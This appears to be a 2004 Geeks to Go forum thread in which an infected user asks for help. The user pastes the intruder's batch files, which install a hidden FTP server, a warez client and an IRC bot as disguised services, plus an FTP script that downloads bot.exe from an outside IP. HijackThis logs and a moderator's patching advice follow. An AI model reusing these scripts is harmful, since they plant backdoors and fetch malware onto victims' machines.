Mon 09Aug04 20:49:13 - FTP Server listening on port number 4898, IP 127.0.0.1, 127.0.0.1
Mon 09Aug04 20:49:13 - FTP Server listening on port number 43958, IP 127.0.0.1
Mon 09Aug04 20:49:13 - You are in the trial period: 26 days of "Professional Edition" try-out left

here is nt.bat

@echo off
ECHO user_nick IFS[TKCC]%random% >> saw.dws
echo Setting Environment Variable for Rootkit's Root Folder
set MXBIN=c:\winnt\system32\dllcache
@echo off
echo Making sure dllcache directory exists..
mkdir c:\winnt\system32\dllcache\
echo Setting dllcache as a hidden DIR if not already..
attrib +h c:\winnt\system32\dllcache
echo Creating directories for packs and files..
mkdir c:\winnt\system32\dllcache\1396
mkdir c:\winnt\system32\dllcache\1396\pax
echo Finished copying Files.
echo Installing Stuff On Newly Acquired Machine
::pause
::---------------------------------------------


echo
echo Installing Serv-U Daemon as a System Service..
c:\winnt\system32\dllcache\mssvc -i keyboard "c:\WINnt\system32\dllcache" "c:\WINnt\system32\dllcache\runbatch.exe" "/u" Y 0 0 N Y
echo
echo Installing Warez-BOX.NET Client as a System Service..
c:\winnt\system32\dllcache\mssvc -i asnetclient "c:\WINnt\system32\dllcache" "c:\WINnt\system32\dllcache\asnetclt.exe" "/u" Y 0 0 N Y
echo
echo Installing Iroffer Bot as a System Service..
c:\winnt\system32\dllcache\mssvc -i mouse "c:\WINnt\system32\dllcache" "c:\WINnt\system32\dllcache\userlist.exe" "saw.dws" Y 0 0 N Y
echo
echo Starting Service: "Warez-Box.NET Client"
net start asnetclient
echo Starting Service: "Serv-U"..
net start keyboard
echo Starting Service: "Iroffer" ..
net start mouse

In Windows/system32 there are a lot of new files, including two exe
PATCH.exe and tsc.exe

Interestingly, while I was trying to post this, these two files disappeared but new appeard with 8/9/04 (yesterday's ! - is that possible or I just missed them previously?) date:
svc.exe, smsc.exe, bot.exe ftpupd.exe msnins.exe
also new are the following: c.bat and bla.txt

c.bat

@echo off
ftp -n -v -s:.pif
smsc.exe
del .pif
del /F c.bat
exit /y

bla.txt

open 209.6.22.83 18830
user blah
pass blah
binary
get bot.exe
quit

I could not post this message from the infected computer. I am sending a copy now from another computer.


finally, here are the two hijack.log First the clean-looking one:

Logfile of HijackThis v1.97.7
Scan saved at 8:58:05 PM, on 8/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\VERITAS Software\Update Manager\sgtray.exe
C:\Program Files\The Cleaner\tca.exe
C:\Program Files\The Cleaner\tcm.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab

and this is the latest:

Logfile of HijackThis v1.97.7
Scan saved at 7:57:07 AM, on 8/10/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\ms32cfg.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\Run: [Windows Media Player] ntnztz.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Windows Media Player] ntnztz.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
  • 0

#13
admin
Posted 10 August 2004 - 07:46 AM

admin

    Founder Geek

  • Community Leader
  • 24,639 posts
Do you have all the latest critical patches applied from Windows Update?
  • 0

#14
tlorott
Posted 10 August 2004 - 08:11 AM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
Probably, I don't. About two weeks go, i.e. before turning to your forum, I had to run "Compaq restore" or something like that which reinstalled the original Windows. After that I did not run the updates. Sorry, I should have done that.
Should I go to Windows Update and make all these updates, now? Should I clean with hijack before?
  • 0

#15
admin
Posted 10 August 2004 - 08:19 AM

admin

    Founder Geek

  • Community Leader
  • 24,639 posts
Please apply the updates before we continue cleaning, or you'll get reinfected as fast as we can clean it.
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP